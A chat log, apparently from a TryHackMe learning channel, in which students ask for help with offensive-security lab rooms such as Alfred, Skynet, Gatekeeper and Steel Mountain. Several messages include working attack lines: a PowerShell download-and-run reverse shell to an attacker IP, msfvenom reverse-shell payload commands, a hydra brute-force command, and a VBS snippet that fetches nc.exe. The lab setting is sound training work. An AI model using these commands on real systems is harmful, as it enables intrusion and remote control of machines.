Does anyone know a solution to this problem?

Please do not ask the same question over multiple channels

ok , sorry about that

Was doing the Retro room and did everything as I was supposed to do, but when I'm finally opening the cmd.exe and typing whoami, I'm still getting retroweb/wade

Any hint/help would be highly appreciated

Can you explain what you did in what order?

After I gained the user flag, I restored the HHUPD.exe, couldn't open the certificate url directly so wrote it manually in IE and tried to save the file and navigated to cmd.exe

There's the problem.

Opening it manually won't work

Then how can I open the url from that link?

You don't need to actually load the page

It's opening the browser

The browser is running as System, that's the vulnerability

Okay got it. I'm trying as you said

That is the problem, it isn't opening the browser

I'll show you

Here I'm not able to click on any of the options

This is part of the challenge

I guess it was a bug or something, after trying for 2-3 times, I was able to open it in IE from there only and got the root flag.

Thanks @keen iris 😄

Hey so I tried to add a user on my own vm (used adduser command) but it gives me a weird shell similar to a rlwrap shell. Does anyone know how to make it a normal shell?

@willow cove what is the command you used to add teh user?

sounds like you didnt add the -s flag

adduser

yes, the full command

sudo -s

adduser rhine

passwd .... rhine

su rhine

i'mn trying to upload a picture of it rn

ahh let me try that

@willow cove adduser -m -G <groupstoadd> -s /bin/bash username is how i generally do it

adduser -m -G users -s /bin/bash newuser

you can change /bin/bash to /bin/sh or whatever your shell of choice

Which distro are you using?

Kali?

yes

building command, just a sec

is this for a new user account or a system user?

a user account

sudo useradd [username] is the base command

man useradd for full list of options

-s allows you to define a non default shell, shouldn't need to specify one in a world that makes sense

i tried useradd -d /home/rhine -s /usr/bin/zsh rhine

and the shell it spawned was kali%

instead of ┌──(root💀kali)-[/home/kali]
└─#

although the up and down arrow work

I also tried not specifying a shell and that starts with $

if you have been having any trouble accessing localhost:8080 after a docker network validation let me know, been having trouble with that. I plan to further investigate this unknown connection issue later today.

https://tryhackme.com/room/internal

hi everyone, i just started this path and i got stuck in the privesc for task 5 under vulnversity. I need help. I will attach screenshots here. Its something to do with nc command causing and error on the target system

this is what i have tried so far but changed the command options but still got the same error

that from running sudo /bin/journalctl ?

i remember one of those privesc involved that

nope just bin/systemctl

which gtfobin are you trying?

oh...nevermind i see permission denied

from your nc shell did you upgrade it? i dont believe you can sudo anything from standard netact

oh i didn't sudo it, just used the script from gtfobin for suid

couldn't upgrade without sudo on target machine

upgrade your shell not your account

that whole python3 -m 'import ty;pty.spawn("/bin/bash")'

theres more to it

but i dont think a standard netcat session can sudo, you need a tty

and take what i am saying with a grain of salt

ok, i will try upgrading the shell. right now i'm open to all options

oh this one, yeah i had to do that gtfobin quite a few times before i got it right

you are obviously not going to do the 1st line of it as systermctl is already installed

@elfin plaza this is an excellent room for learning about shells, reverse shells, how to stabilise etc: https://tryhackme.com/room/introtoshells

thanks a lot, i will check this out.

Gave +1 Rep to @tight nymph

Figured it out finally. I should remind myself never to make it so complicated next time 😓

@elfin plaza awsome, what was the issue?

i had to not use nc cos like you said, without sudo i wouldn't be able to get it to work on target machine but i could still use the gtfobins idea to get access to root.txt using a different command in place of nc to read the file

Just wondering, how far will this pathway get you? Would you be ready for bug bounties and advanced CTFs by the end of it?

@elfin plaza oh cool so you got it doing a different method? thats awesome, finding unintended pathways is always cool 🙂

Probably just copied the root.txt to /tmp or some other directory that’s accessible to a non-root user

If you’re struggling to get a reverse shell, you can always try and put that command in a bash script and get the service to execute that

Also, if one reverse shell script doesn’t work, the python one is pretty reliable as well

Yeah, that’s exactly what I did. Figured using the sample script from gtfobins, if I could set the id of the output to root then It means I can execute other commands normally done with root privileges

glad to hear you figured it out, and by not blindly copy / pasting, figured out how to make it work for you. Thats probably the hardest part of cybersecurity and maybe IT in general. Figuring out how to make someone else code work for you

no points for grats so heres a thanks @elfin plaza

Gave +1 Rep to @elfin plaza

hi guys

need help with Apache Tomcat 7.0.8 JSP Upload Bypass Remote Code Execution

dun quite understand

anyone can help?

Hey, people. Got stuck in 'Retro'. After placing finding user's password, can't access rdp with them or any EoP with reverse shell dropped. Does anyone has tips?

If you have the right credentials, RDP should be accessible. Privesc is possible via rev shell as well, you'll just have to enumerate some more.

There is more than one way to root that box.

447l90k*/-k m-+

hey guys, ive got stuck in the overpass2 room. In the part where you get a hash and a salt and have to crack it, I can't seem to get the password using johntheripper even when trying all of the formats it suggested

#room-hints message

Thanks!

the last 2 rooms in the Advanced Exploitation module are pretty cool, nice work on them 🙂

Is it common that a fully interactive reverse shell be laggier than an initial unstable shell? Can't determine if i need to upgrade my network connection, or it's a fully interactive shell thing, or it's a vpn thing.

What you mean by laggy ?

laggy as in keypresses are delayed

Noticed a pattern of having to wait 4 minutes or so for keypresses to appear, then I'd have a half a minute of "good connection" where keypresses are about 0.3 second slow to show. Thereafter I'd have to wait another 4 minutes...

Are you having that right now, or you are not having a shell whatsoever now so we can try ?

im having a shell right now

i dont notice that when it's the unstable normal shell

So check ip a s on your local machine to see if you only have a tun0 interface or any extra like tun1, tun2 etc

yeap, i'm having the THM VPN

Okay, but the question is if you have more interfaces then just tun0 🙂

i have tun0, tun1

But you are not using any other vpn then the thm one ?

it looks like repeated vpn connections

yea, i should only have the THM VPN connected

Then do sudo killall openvpn , then connected to the thm vpn again, after that check again ip a s to see if you now only got a tun0 interface and not any extra like tun1, tun2 etc. anymore

After you fixed that, reconnect to that target machine and check if the issue with the shell is solved

i have tun0 only now

But make sure you reconnect

ohyea, it feels snappier

as in, i'd have to dc and reconnect?

Ye, but I guess you got disconnected from the target machines anyways after you killed openvpn. So you should be fine.

i didnt actually.

In case the issue comes back while you are sure that you only have a tun0 interface, write it in #site-support

so it was the double vpn connection that was causing issues

if i have weirdly formatted text is that also due to the double vpn issue?

weirdly formatted as in, weird characters popping up as i type or typing over characters

I'm not sure, but I don't think so.

thats a tty issue?

Maybe, not sure. You might want to verify in order to be able to send screenshots, so you can post a screen of that.

!docs verify

don't have it now. maybe next time

working on the room "Overpass2 - Hacked". Following the walkthrough (https://infosecwriteups.com/tryhackme-overpass-2-hacked-walkthrough-351daeaeca89), at the last task, the author executed a binary .suid_bash which gives you a root shell. That seems like a rather dangerous move, running an unknown binary. Is that common practice? is there a better way to do it? Perhaps some checks I can run or so

It's being ran on the target machine

So the risk to you is basically 0, certainly no more than SSHing in

that part I get, would it be common to do so CTF or even real pentesting?

You'd commonly live off the land in a pentest, with what programs you've got.
In a CTF you'd usually reverse engineer the program if you don't trust it. Or an isolated environment for debugging etc, like malware RE

(also you can take a checksum of that binary, it's literally just the standard bash binary that's on the box but with suid added)

that makes sense.

Hi,

is there anyone here who can help with mona in the bufferoverflowprep module?
It seems to me that mona's compare isn't working very well and the only technique that works is to look on my own on the stack to see the bad characters.
Maybe I miss something regarding mona.

You can PM me if you still need hlep

Has anyone accessed the HackPark room on this path lately? It appears to be down for me.

It doesn't respond to pings.

Doesn't mean it's down

All good it responds now, it was not opening any webpage for some time.

it takes a bit longer to fully set up

for the Overpass 2 - Hacked room, while going through https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go , I didn't understand that well what exactly is being done in the code. I would really appreciate if someone can point to mandatory pre-requisites and could answer:

1. what's the role of default hash and a hardcoded salt in the code?
2. why the attacker needs to pass the hash while running the backdoor executable?
   I guess it has to do something with ssh connection but things aren't clear.

what's the role of default hash and a hardcoded salt in the code? Default is what it sounds like. It's the default, if you don't specify one.

2. Because that's how the program works...

It uses the SSH protocol, but is not the same as SSH as you know it. It's not an OpenSSH or Dropbear server. It uses the SSH protocol to communicate, not to provide the shell.

thanks for a quick response but I need to be more specific in my questions

1. why the backdoor code need a hash and a salt?

the answer to it may be very basic but I am not getting it

Because storing passwords in plaintext is bad practice

And it is a part of the challenge.

It also means the password is not transmitted in plaintext

Alright, would you also explain technically what exactly the backdoor executable does

It's an authenticated backdoor that uses the SSH protocol to encrypt communications

and how does it benefit the attacker exactly

It's easy return access? Persists across a defender changing a password? It's a backdoor...

alright! seems like I really need to get familiar how the backdoors actually work. Anyways thanks a lot for your assistance.🙏

pls, in terminator room, why when i bruteforce the squirrelmail with the credentials i've found on smb share there are so many false positives?

here's the command and output

that ^LOGIN^ should be ^USER^ i believe

same result with USER

this is skynet? give me a sec i will give you the hydra command i used for this room

okay okay

and yeah it's skynet

hydra -l milesdyson -P files/log1.txt -u 10.10.67.48 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown" -f -V

the files/log1.txt is a file i obtained from smb

@fleet wedge can you add me reall quick I have a private question

the pass.txt file you are using, is it a file you got from the skynet box or something else?

its the log1.txt

im trying some things

the command i posted above then, that yielded me a password from that log1.txt

Sure?

ok so it apparently works with the "-f" flag

hrm? the hydra, -f means to stop running on the 1st success

i have a guess but not sure of why it works

i always did -f and -V (stop on 1st hit, and verbosity) does it fail (as in keep going) without the -f?

i guess after the successful attempt it starts doing some obscure stuff and thinks every password is right

but maybe i'm wrong

anyway thanks

Gave +1 Rep to @tight nymph

Has anyone done the buffer overflow prep room?

Could I get some help with the Relevant room? I'm looking at the walkthroughs, but nothing was mentioned about how they arrived at the conclusion that the PrintSpoofer exploit. I ran winPEAS, and it did not show up. Would like to know what else I could do to supplement the results from winPEAS.

I believe, the assumption was based on user having SeImpersonatePrivilege privilege. There are two vectors associated with its abuse: Juicy Potato and Print Spoofer. However, I didn't find the Print Spoofer while googling 😦 Also finished the room thanks to walkthrough.

Gave +1 Rep to @tame ivy

That's a little bit disappointing

@tame ivy @frail gyro i attributed my lack of windows knowledge to how long this one took me. Getting onto the box was easy enough and I knew the ||SeImpersonatePrivilege|| was somehow meaningful, but I only had experience using that privesc with tokens. After 1-2 hours of googling i did find this: ||https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/|| and the matching github page for the ||PrintSpoofer|| which helped me understand the privesc better as well as solve the room.

hey guys anybody did alfred room >?

yes?

please no DM, ask you're question here

yes i recall the powershell command (i actually took notes for this one)

oh ok i did not want to spoil

"GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 404 -

i keep on getting this every time i try shell does not want to connect

Can you show us what you're doing?

!docs verify

If you follow those steps, you'll be allowed to send images.

||

||*
C:\Program Files (x86)\Jenkins\workspace\test>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.244.113:85/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.244.113 -Port 9001
Exception calling "DownloadString" with "1" argument(s): "The remote server ret
urned an error: (404) Not Found."
At line:1 char:46

• iex (New-Object Net.WebClient).DownloadString <<<< ('http://10.10.244.113:85/
  Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.244.1
  13 -Port 9001
  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : DotNetMethodException

The term 'Invoke-PowerShellTcp' is not recognized as the name of a cmdlet, func
tion, script file, or operable program. Check the spelling of the name, or if a
path was included, verify that the path is correct and try again.
At line:1 char:119

• iex (New-Object Net.WebClient).DownloadString('http://10.10.244.113:85/Invoke
  -PowerShellTcp.ps1');Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.244.1
  13 -Port 9001
  • CategoryInfo : ObjectNotFound: (Invoke-PowerShellTcp:String) []
    , CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException||

this is what i get on the console output on jenkins

Is the Invoke-PowerShellTcp.ps1 script in your current directory when you host the webserver?

yes that's why iam so confused

lool

Sounds like it isn't, given the 404 on your webserver. Check again, make sure it's all typed correctly too.

https://tenor.com/view/the-wolf-of-wall-street-clap-clapping-clapping-hands-leonardo-dicaprio-gif-22829304

Thank you accidentally for got tcp

Hi guys, I've recently started using TryHackMe, and I am not too familiar with Linux, so I am having a little problem on the second problem, on
Vulnversity, on Task 2 when we have to use nmap, I deployed a machine, used nmap, and after quite a long time I got the scan back, found some of the answers, but I didn't find the squid proxy. I've checked my commands, I've create a new Attack Box, restarted it, switch browsers, turned VPN on and Off, this was my 8th try everything is right, but I am not getting the correct output as I was supposed to be getting. Instead I keep getting a 405 on a Get Request, I really want to solve this but not sure what to do here.

That means you're using the IP of the attackbox, not the IP of the target.

Oh wow, I spent so much time on this to be that, well guess I will learn lol. Thank you James.

Gave +1 Rep to @keen iris

Could you help me please! I am new in BufferOverflowing. A started the BufferOverflows Task7 Overwriting Function Pointers. I could find the return address of the special function and I could write it use little endian format to Hex but I can't know what command I have to use to call the special function.

but I can't know what command I have to use to call the special function. Huh?
You need to overflow the buffer to overwrite the return pointer on the stack?

Please anyone here help me how to download a file on github to a server

i tried wget and it shows dns resolve issues

Is this related to a tryhackme room?

No, I learn on tryhackme and test my skill on htb

I just finished the AoC

This channel is for the TryHackMe offensive pentesting path

I know, hence the question, it's fine if i don't get the answer

You're asking in the wrong place

Thank you.

I dont know where, sorry

Aftere I run gdb -q func-pointer. After the run command I use the AAAAAAAAAAAAAA'specific function starting HEX number in 6 bytes Litle Endian' but I got back the Program received signal SIGSEGV, Segmentation fault. Answer.

Is that enough bytes to overwrite the function pointer?
Do you know what you're overwriting it with?

Yes it is enough because the buffer size is 14 I get the 0x0000000000400041 to A15 and 0x0000414141414141 to A20 from this my 6 bytes return is '\x67\x05\x40\x00\x00\x00' - what is the specific function starting address.

You get those values where?

I run the func_pointer in gdb. After I started to test how many characters need for the buffer overflows

I used this write up for this but the end of this write up is not good.

https://bobloblaw321.wixsite.com/website/post/tryhackme-buffer-overflows

hey guys anybody here did the brainstorm room ???

Yes.

Hi, Is there any issue with Brainstorm room?

Only with the port scan results iirc? Are you having an issue?

I run the func_pointer in gdb. After I started to test how many characters need for the buffer overflows
I used this write up for this but the end of this write up is not good.
https://bobloblaw321.wixsite.com/website/post/tryhackme-buffer-overflows

I wanted to know if you guys have an idea of how to transfer the chatserver.exe and .dll file

i've been trying to do it on the tryhackme attackbox as trying to install immuunity dbg on kali box gave me issues

Absolute most common issue is downloading the files in binary mode

Hello i'v tried to used gobuster alors the path and i think i see what is does but i'm not understanding what is the purpose of sending a list of word to find directory. I guess the purpose of gobuster is to find dir or file but i don't know how gobuster do it and what is the purpose of the wordlist.
can someone explain it to me i didn't find anything clear about it, i'll be gratefull if you can, i'm a bit lost ^^'

Hi @graceful lagoon !
I recommend doing this room: https://tryhackme.com/room/contentdiscovery

okay thanks !

Gave +1 Rep to @brisk maple

Yes and with the services as well. Connection Time Out Error.

Hello guys, I need some for the Alfred room. If follow the steps I can't get a meterpreter shell with the payload generated with msfvenom.

I don't understand why

Can you tell us what you're doing?

Preferably with screenshots

I generate a payload with : msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=myIP LPORT=4444 -f exe -o rshell.exe

After that I upload it via Jenkins with : powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

And then I execute it with : powershell Start-Process 'rshell.exe'

Ok, try it from the powershell reverse shell you got earlier.

Also make sure you set your payload and LHOST correctly in your msf handler

I did and it works but I don't get a meterpreter session (which is needed for the steps after)

This.

Oh I see what you mean

I triple checked it's good but I will try to execute the shell from the powershell session

Ok it works when I execute the payload from the powershell session 🙂 thanks (should have tried it earlier)

Gave +1 Rep to @keen iris

I can't tell you why, at a guess it's something to do with long running commands?

I was starting my learning path and in vulnversity there is a task to do nmap port scanning. However there isn't target machine ip provided so I assumed it should be same as in deploy machine task. I made a nmap scan (nmap -p- -T4 target_ip) and found that there is 2 ports open (22 and 80) but that isn't correct answer? What on earth is happening?

Solved it meanwhile ?

nope

Is the target machine still up ?

not anymore. I reached timelimit so have to try again tomorrow

I hade same issue yesterday

Okay, ye then get back here in case the next time you try it's not working again

Anyone free here to give me a nudge on relevant, maybe less of a nudge and more just confirmation that I am going down the right path here as I have been stuck for a while.

I have a question regarding windows privilege escalation and will appreciate any help-
When it comes to potato exploits, i found out that in order to run any potato exploits, DCOM must be disabled on the target Windows machine. Is there a powershell command to check the DCOM status?....I found a way however it required GUI access and going to regedit and checking the registry value

You can query the registry with powershell

oh yes

Hello i have questions for the https://tryhackme.com/room/bufferoverflowprep OVERFLOW4.

1. Upon practicing this task I've got the different (two additional) invalid numbers (\x), which did not meet the room answer but resulted in successful reverse shell in further steps (triple checked the prefix = "OVERFLOW4 "). As I do not have the deep knowledge - is it possible in the real life scenario to have different sets of invalid bytearrays for the same jump point?
2. MSF venom generates the python2 payload which is not out of the box compatible with the python3 (cannot add bytes to string). Is there an option in msfvenom to generate the python3 version of payload? At the moment my current syntax is :
   msfvenom -p windows/shell_reverse_tcp LHOST=<ip>LPORT=<port> EXITFUNC=thread -b "<invalid bytes>" -f py -v payload
   then I do find and replace += b" > += "

Room: https://tryhackme.com/room/blue task 1.
I'm enumerated the target but OS detection fails. How do I establish what the machine is vulnerable to? I can see SMB is running and that according to nmap service detection its SMBv1. I've tried the exploit DB for SMB exploits and there's a lot of them. Whats the process of whittling the list down?

Hi everyone! I'm in the Post Exploitation Basics room on task 2 for this pathway. Not sure if I am missing a trick here, but I'm having some trouble running the cmdlets listing in the room for Powershell after executing ./PowerView.ps1. When I run the "Get-NetUser | select cn" or other commands after this step the terminal returns a message stating the cmdlets not recognised

Dot space dot backslash to import

Thanks @keen iris ! I certainly did miss the trick haha! 👍 😆

Gave +1 Rep to @keen iris

Hey ! I have an issue with ftp on Brainstorm. Once i m logged in, i type ls or dir i get this error "229 Entering Extended Passive Mode (|||49337|)" and i cant do anything more basically. I am using Kali 2021.3 fully updated and upgraded. Anyone knows a workaround? Thanks!

solved typing "passive"! have a good day hackers!

I. Think i have a very simple question but cannot find the answer… I have reverse shell with msfconsole and want to open a new session… how to do that (and keep the current reverse shell open)

Sort of like ctrl-z and then bg

Sessions 1 did the trick..

Hello , i have problem with "Blue" challenge , Task 4 , the "hashdump" command take too much time and it doesn't work , can anyone help me please ?

Having some issues with the Brainstorm lab when testing the Buffer Overflow locally. I am using Immunity debugger on a Windows 7 local virtual machine which runs the chatserver.exe perfectly well but when I am trying exploit the executable the buffer overflow offset keeps varying for unknown reasons. I am getting values between 3000 - 3500 when I know that on the TryHackMe Target Machine the offset actually lies at 2000 area

Does anyone have any suggestions to help make my local vm borderline identical to the one used by TryHackMe? I am unsure if I have additional security functions in place on the Windows vm that is causing potential issues with this lab

Any suggestions are really appreciated !

What is the other way to find about internal ip:port in box Internal if there wasn't any Jenkins.txt file to tell us???

Solution for those who have same problem: for some reason the first time disabling ASLR did not work but repeating this step and disabling ASLR globally in the registry stopped the address space from sliding around and fixed the offset at the required location.

The room HackPark in kinda outdated now, particularly with the windows-exploit-suggester. The repo of that tool is very outdated (5+ years without a single commit) and the installation has to be done with python 2. I would suggest adding a little change (if the owner of the room doesnt want to update the whole room itself) so that the new suggested tool is https://github.com/bitsadmin/wesng, a much more recent version of the windows-exploit-suggester

Hey guys. Anybody know how long it takes for the kenobi room to start working?

Hello, did you solve the issue?

Could someone explain what is the difference between msfvenom -p windows/shell/reverse_tcp and msfvenom -p windows/x64/shell_reverse_tcp, and why does the second work but not the first ?

(Relevant room)

One's staged, one's stageless.
One's 64bit, ones's 32

okay, I don't really know what staged/stageless means I'll look it up, thanks

I thought 32 bits stuff were compatible with 64 bits though

Should be, I can't find much on it though

that must just be the staged part that doesn't work

anyway thanks for making me discover this

Just using winPEAS.bat and piping the output to a text file to look through on my host. I'm getting strange characters (e.g. <0x1b>[33m[+]<0x1b> in place of color. I'm assuming these are colour controls but they arent displaying as such in vim or sublime. Any ideas?

Hi. No, nmap wasnt able to reliably identify the host. Take a look at the services running and then use specific nmap enumeration scripts against them. This will help you work out what the system is vulnerable to
||https://www.infosecademy.com/nmap-smb-scripts-enumeration/||

Fixed my own issue. Install ANSIescape in Sublime and set the syntax to ANSI. All working now

Hi everyone! I'm going through the Windows Privesc room (I hope this is not the wrong channel) and I noticed there are a few services exploited through weak permissions and such. My question is, how do you identify a vulnerable service? Do you just list all of the services and go through each and querry the service config?

You learn what to look for.
You look for versions, configuration, you poke around.
You use vulnerability scanning like nmap scripts, enumeration tools like enum4linux/smbmap, all sorts.

Enumerate, enumerate, enumerate

Hello guys, I have a question about EternalBlue (I'm on the Relevant room). I successfully used the MS17-010 exploit from Sleepya but I'm having a hard time understanding what it really does and how I can exploit it. I know there are python scripts to get a reverse shell but is there more to do with only Sleepya's exploit ?

BTW I want to exploit it without Metasploit

In gatekeeper my exe is not opening on my lab

I tried both get and mget command to download the file

Download it in binary mode

Wait, is it downloaded over FTP?

If so, then yes. Binary mode required.

No it's from smb share.

You need a windows 7/8 virtual machine that is 32bit and has ASLR disabled along with windows defender/firewall

^^^

Is there no way to make it work on 64bit. I can't install new 32bit windows right now.

Why not just get a virtual machine up and working?

I might have got it to run on windows 7 vm 64 bit, but can't remember

Have you searched the error code at all?

I did it asked me to install .net and visual c++ distributable and other solutions still didn't work.

Ok I found out how to execute a binary with the Sleepya code

hey anybody uses 403bypass ?

I've gotten very comfortable with finding offset and bad character in OSCP BoF box. But after that I can't get shell, I got the shell by using similar method in gatekeeper but not in OSCP can anyone help me???

Does oscp bof box has something different ??

Hello, I'm getting a lot of crash from the Relevant target machine. Is it possible that it's crashing because I'm poking at it too much or is there a stability problem ?

When running the post/multi/recon/local_exploit_suggester is it normal for it to finish with an error "Post interrupted by console user"? This is in the Metasploit room.

I assume it's possible irl, but for this room is that expected.

Well, this actually seems to happen on all post exploitation modules I try to run, so I will assume it's expected.

Hey guys Im working on the Attacktive directory room, Im trying to crack one of the Kerberos AS-REP hashes you get early on. Why is my hashcat not able to crack this hash? Is my format messed up some how? What could be the issue here. I am using the cracking mode of 18200 for krb5asrep$23. This hash in the screenshot below was originally $krb5asrep$18. but I changed the 18 to 23 since I saw many walkthroughs had 23 in that spot, I thought maybe that would fix it

I realized that I was trying to crack a Kerberos 5 AS-REP etype 18 hash which I guess wasn't the right hash to crack, once you start the process of using impacket-GetNPUsers it's only then that you obtain the hash that can be cracked ($krb5asrep$23). I obtained what I though to be the crackable hash when I ran kerbrute. Still slightly confused here though, can anyone explain why one hash was cracked in a second and the other couldn't be cracked with the same wordlist?

How can we increase the speed for metasploit brute force password attacks ??

Have you done show options to check if there is something related to speed or googled it already ?

there is a range for speed 0-5 but still its slow

can we use GPU for this process?

Then you probably limited to that, but you might wanna google that

thanks

Gave +1 Rep to @dense gate

But depending on what exactly you are brute forcing, you might want to use hydra for such a task

ssh login

Ok, well I guess that's slow anyways, but trying hydra might be worth

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-20 22:56:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task

the problem is one try per task

using metasploit module works but as its slow its taking up lot of time

Which room are you doing btw ?

metasploit

Which metasploit room (there are several) and which task ?

it's not a task i am just trying different ways to bruteforce

@clear hawk please don't ask the same question over several channels.
Please only use the path related channels for path related questions

@frigid ravine If this isn't related to a THM room, please ask your question in #general or #infosec-general

oop sry

options enough

hi !! my 10% voucher of comptia pentest+ is available to use before 31/12/2021, BUT i just finished the path 19/01/2022 !!!! does it make any sense ?

Hackers ! have an issue with gatekeeper, while loading the gatekeeper.exe into ID i get an error "VCRUNTIME140.dll reinstalling the program may fix this problem" so i redownloaded the exe file and reinstalled ID as well but no changes. Any help? Thanks

here on port 445, netbios-ssn is being displayed. I'd read that port 445 is used by Microsoft Directory Services for Active Directory (AD) and for the Server Message Block (SMB) protocol over TCP/IP.
SMB rely on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP and this uses port 139.
So, what should I conclude? Is there something else I should know or there's something wrong with nmap's details?

Nmap service name column is a best guess based on what's commonly used on that port

Also with nothing is the reported versions are different

I don't know the context of what you're scanning so I'm just speaking generally

Not if you use -sV like they're doing. Then it'll actually do fingerprinting

thanks for your response! I am having an issue with info displayed at service column only...versions aren't of concern to me here...I just need a confirmation on whether port 445's service being displayed is correct or not.

Gave +1 Rep to @wind tartan

Good to know, thanks 👍

Gave +1 Rep to @keen iris

What's the issue with the results?
It finds 139/445 for smb, I do not see the issue.

should I consider netbios-ssn and smb the same?
Actually I read that NetBIOS is completely independent from SMB and according to me port 445 should either run microsoft-ds or SMB over TCP/IP.
While SMB which is dependent on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP should run on top of NetBIOS(netbios-ssn) using only port 139 and not 445 as it's being displayed in the output.

Hey all Im working on the Post-Exploitation room for AD. Trying to use Powerview but most of the commands I try which are in the provided cheatsheet aren't working when I try to run them Any advice?

The room provides it's own version of PowerView and links a Cheatsheet of commands to use so I assumed the commands on the cheatsheet would work, maybe there's just a discrepency between versioning but I just wanted to make sure I'm not using this command incorrectly or something

Can you show how you imported powerview?

I didn't import it at all, it was already put on the DC that is being used in this rom

room*

So that's why Im wondering maybe theres an issue with versioning

Before you can use the functions defined in the script, you need to import it.

What do you mean exactly? When I RDP

When I RDP'd into the machine in this room Powerview.ps1 was already in the downloads dir so I assumed I could just run the commands

By importing do you mean . .\Powerview.ps1

Making assumptions is dangerous, especially if they involve you skipping over instructions in the room

Yup I did those steps, ran the execution bypass command and then started powerview with . .\Powerview.ps1

Were you in Downloads?

I ran . .\Downloads\Powerview.ps1

Would that have messed it up

is that ..\ or dot space dot backslash?
A screenshot would be much clearer

That's why I asked you to show this.
Dot space dot backlash is for import, as is Import-Module

Ok. Make sure you're in a 64bit powershell session, not an x86 one

Gotcha, I was unaware the . .\ was 'importing'

How can I ensure Im in a 64bit session?

Explicitly start one?

Alright im just not exactly familiar with how to explicitly start ps sessions with a certain architecture, have never done that before.

Not the x86 ones

Im obvi a noob just trying to work on AD Enumeration, I wasn't aware that the architecture of the shell session would affect how this tool works so I do apologize

Ah I see

No idea, just some docs somewhere say some commands aren't available in x86 sessions

Gave +1 Rep to @keen iris

ty for the tip, Wouldn't have caught that for sure

Is that working?

Tool seems to be working better overall but the same command that didn't work above is still throwing an error. Will just have to find a workaround

Hey All, this can probably be assumed but it's a question that came up while I was working thru the Kerberos room, so to properly use Rubeus am I correct in understanding that I (as an attacker) will need to have already compromised a domain acount which gives me shell access to the DC, from which I need to be able to compile and upload rubeus to the DC

So using rubeus isn't likely an initial attack vectors when you are first starting out on a network and looking for that first set of credentials

hi any one share ur knowledge abt cyber security

like pen test

i want to interested in learning offensive security

You don't have to be domain admin to run Rubeus, I don't think you technically have to be even local admin though I think some things might not work if you aren't. Rubeus would be useful in pivoting and privilege escalation. By the time you use Rubeus you should already have a foothold on a target in the network. Hope that helps!

This plays into the arch types of systems. x64 is technically x86-64. It is an extension to the x86 instruction set as it uses 64bit registers vs the x86 which uses 32bit. 🙂 hope that helps

Yup that exaclty what I was thinking, Rubeus is only to be used once I have a foothold, Ie. I need some set of valid creds for ANY user.

hello all ! I'm struggling with the Gatekeeper lab, my python script works fine with my own test of gatekeeper.exe on a windows VM with Immunity Debugger, but the script does not work with the actual target! I'm using telnetlib instead of the usual socket library because it does not work with my tests. Please any help is welcome!

So you successfully got a reverse shell when testing on your own Windows VM, but you're not able to get a reverse shell with the actual target?

Exactly. I just can't fathom why? I wonder if it's related to the VPN. That would be the only difference. To make sure, I want through the writeups and found the same offset and same EIP address

Are you using a x86 or x64 payload?

I actually don't know. The VM i'm using for my test is 32bits

hold on

Maybe you could share the command you used to generate your msfvenom payload

msfvenom -p windows/shell_reverse_tcp LHOST=XXXX LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

the badchars are not these ones but that's the command i'm using in general

Ok that's a 32 bit payload, so that should be good

Hello! So today i was trying to complete the Steel Mountain box. It was smooth through the metasploit section but trying to get root manually i ran into an issue. Trying to run the exploit thru python it gives me this error code. "line 37
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape"

I wish that was the problem 😆 so I have to find another lead

I'd honestly recommend just following the official writeup from start to finish

should get you where you need to be

must be a missed step somewhere

yeah but the guy did it in ruby that's why i didn't do it 😕 i'll try another one online

https://etchedshell.medium.com/try-hack-me-gatekeeper-e796edbe09da try this writeup

thanks! i'll check it out

where can i find a complete pentesting checklist?

I managed to adapt it to python3 (which I know) and got it to work finally. Thank you for help 👍

Gave +1 Rep to @pearl citrus

no problem! glad you got it working

How do I complete blue if its an offline machine?

You talk about that room? https://tryhackme.com/room/blue

Correct

There is still a target machine attached to that room. It's just in case you want to, you could get the machine for offline usage as well.

So it's just optional

Okay, sounds good.

How do I crack the password in blue once I have the hash

Have you started researching that?

Yes

What's your research found?

I'm trying to use hashcat, I put the hash into a file, but I just cant figure out the command to get it to run correctly, and I don't know which options to use

Ok, so you need to tell hashcat what format the hash is

And you need to tell it the wordlist

And provide the hash or a path to a file with the hash in

Im using the rockyou wordlist, but I don't know what format it is.

Ok, so some research again. What format are Windows password hashes?

-m

(That question is rhetorical)

MD-4